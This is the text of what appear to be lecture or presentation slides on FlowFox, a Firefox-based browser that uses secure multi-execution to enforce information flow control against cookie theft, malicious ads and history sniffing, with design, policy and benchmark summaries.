FLOWFOX

A WEB BROWSER WITH FLEXIBLE AND PRECISE INFORMATION CONTROL

ROADMAP

1. Background

2. Threat Model

3. Design

4. Security Policies

5. Implementation

6. Evaluation

BACKGROUND

same-origin-policy (SOP) has holes

1. Examples to bypass SOP

2. More powerful security enforcement mechanisms are required.

XMLHTTPRequest？

BACKGROUND

Information flow control

Any program can be seen as a machine with inputs and outputs. Inputs can be classified high credential input and low credential input. The same for output.

BACKGROUND

Example for Information flow analysis

High Input:document.getElementById(‘email.input’).text

Low Output:*.src=*

BACKGROUNDNoninterference

A program is defined to be noninterferent if its outputs cannot be influenced by inputs at a higher security level than their own.

Termination-insensitive noninterference

1. A version of Noninterference.

2. Under the assumption that a program always terminates normally, information is only disclosed by the program when it terminates.

3. Many existing tools can effectively determine a program as long as the assumption holds

BACKGROUND

Termination-insensitive noninterference Vs. Termination-sensitive noninterference

BACKGROUND

In Context of web security

Many state-of-art information flow systems can detect information leak for this case

BACKGROUND

Timing-insensitive noninterference

Assumption: the execution result has nothing to do with the execution time

BACKGROUND

Secure Multi-Execution ([18])

1. An information flow control enforcement mechanism

2. As its name suggests, secure multi-execution will execute a program multiple times, once for each security level.

3. SME regime will guarantee non-interference

4. FlowFox implements SME

BACKGROUND

Secure Multi-Execution Rule

Image.src

Document.cookie

Image.width

BACKGROUND

Example of Secure Multi-Execution

BACKGROUND

Secure Multi-Execution

Pros:

1. Secure multi-execution is sound:

2. Secure multi-execution is precise

Cons:

1. Cost in CPU time and memory use

THREAT MODEL

Examples

1. Session Hijacking

2. Malicious Advertisements (Plugins)

3. History Sniffing and Behavior Tracking

FLOWFOX DESIGN

Two Design Alternatives

1. Multi-execute entire browser:

1. Easy to implement

2. Too Coarse grained and imprecise

FLOWFOX DESIGN

Two Design Alternatives

2. Multi-execute the web scripts (FlowFox)

1. Treat all interactions with the browser API as inputs and outputs

2. Fine grained

3. Hard to implement

SECURITY POLICIES

1. DOM API will be specified policy

2. FlowFox policy specifies two things

1. Security levels to DOM APIs

2. Default value to each DOM API call

3. Policy Rule

SECURITY POLICIES

4. Examples

IMPLEMENTATION

1. Implemented on top of Mozilla Firefox and consists of about 1400 new lines of C/C++ code

2. SME-aware JavaScript Engine

1. JSContext has a security level field

2. Each property of JSObject has a security level field

3. Only properties with the same security level as the coordinating JSContext are visible

3. SME/IO Process

4. Event Handling

1. Low events will be handled by both the low and high executions

2. High events will only be handled by the high execution.

EVALUATION

1. Security

1. Is FlowFox Non-interferent

1. Two reasons FlowFox could fail to be non-interferent

1. Violate the assumptions underlying the soundness proof

2. Exist implementation level vulnerabilities

2. Hard to guarantee.

EVALUATION

1. Security

1. Examples of mitigating threats

1. Leaking Session Cookies

2. History Sniffing

3. Tracking Libraries

EVALUATION

2. Compatibility

1. Two regular FireFox browsers and one FlowFox browser

2. A simple policy that makes reading document.cookie high

3. Crawler dumps a screenshot of each of the three browsers to a bitmap

4. First, compare the bitmaps belonging to two FireFox browsers and find the same area (unmasked area).

5. Second, compare the unmasked areas for bitmaps belonging to FireFox and FlowFox browsers.

EVALUATION

3. Micro Benchmark

1. Measure the overhead of executing pure JavaScript.

2. Measure the overhead for I/O intensive applications.

3. Executing pure JavaScript incurs large overhead

4. IO test shows only a negligible impact overhead

EVALUATION

4. Macro Benchmark

1. Measure the impact on the latency perceived by a browser user

2. The results show that the user-perceived latency for real-life web applications is acceptable

EVALUATION

5. Memory Benchmark

1. Measuring 500 different websites

2. FlowFox incurred a memory overhead of 88%